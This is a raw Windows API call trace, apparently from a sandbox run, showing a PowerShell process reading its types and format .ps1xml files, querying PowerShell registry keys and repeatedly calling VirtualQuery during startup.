	[0270.235] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.235] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.236] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.236] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.236] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.236] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1b4, lpOverlapped=0x0) returned 1
	[0270.236] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x0, lpOverlapped=0x0) returned 1
	[0270.237] CloseHandle (hObject=0x334) returned 1
	[0270.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0270.237] SetErrorMode (uMode=0x1) returned 0x1
	[0270.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0270.237] SetErrorMode (uMode=0x1) returned 0x1
	[0270.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0270.237] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x334) returned 0x0
	[0270.237] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0270.237] CoTaskMemAlloc (cb=0x5a) returned 0x2bb680
	[0270.238] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x2bb680, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0270.238] CoTaskMemFree (pv=0x2bb680) 
	[0270.238] RegCloseKey (hKey=0x334) returned 0x0
	[0270.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0270.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0273.835] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.843] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.844] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.845] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.846] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.846] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.846] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.848] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.857] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.857] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.857] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.857] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.857] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.857] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.858] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.858] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.864] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.869] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.870] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.870] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.870] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.870] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.871] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.871] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.871] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.871] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.872] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.872] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.872] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.872] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.874] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.875] VirtualQuery (in: lpAddress=0x16c1e0, lpBuffer=0x16d0a0, dwLength=0x30 | out: lpBuffer=0x16d0a0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.875] VirtualQuery (in: lpAddress=0x16c1e0, lpBuffer=0x16d0a0, dwLength=0x30 | out: lpBuffer=0x16d0a0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.876] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.428] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.328] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.328] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.328] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.333] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0276.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.333] CoTaskMemFree (pv=0x2ca2e0) 
	[0276.334] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.339] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.339] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.339] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.339] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.340] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.340] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.341] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.342] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.342] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x1c8) returned 0x0
	[0276.342] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d69c, lpData=0x0, lpcbData=0x16d698*=0x0 | out: lpType=0x16d69c*=0x1, lpData=0x0, lpcbData=0x16d698*=0x74) returned 0x0
	[0276.342] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d60c, lpData=0x0, lpcbData=0x16d608*=0x0 | out: lpType=0x16d60c*=0x1, lpData=0x0, lpcbData=0x16d608*=0x74) returned 0x0
	[0276.342] CoTaskMemAlloc (cb=0x78) returned 0x261110
	[0276.342] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d5dc, lpData=0x261110, lpcbData=0x16d5d8*=0x74 | out: lpType=0x16d5dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d5d8*=0x74) returned 0x0
	[0276.343] CoTaskMemFree (pv=0x261110) 
	[0276.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0276.343] SetErrorMode (uMode=0x1) returned 0x1
	[0276.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0276.343] SetErrorMode (uMode=0x1) returned 0x1
	[0276.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.343] SetErrorMode (uMode=0x1) returned 0x1
	[0276.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0276.344] SetErrorMode (uMode=0x1) returned 0x1
	[0276.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.344] SetErrorMode (uMode=0x1) returned 0x1
	[0276.344] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0276.344] SetErrorMode (uMode=0x1) returned 0x1
	[0276.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.344] SetErrorMode (uMode=0x1) returned 0x1
	[0276.344] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0276.344] SetErrorMode (uMode=0x1) returned 0x1
	[0276.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.345] SetErrorMode (uMode=0x1) returned 0x1
	[0276.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0276.345] SetErrorMode (uMode=0x1) returned 0x1
	[0276.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0276.345] SetErrorMode (uMode=0x1) returned 0x1
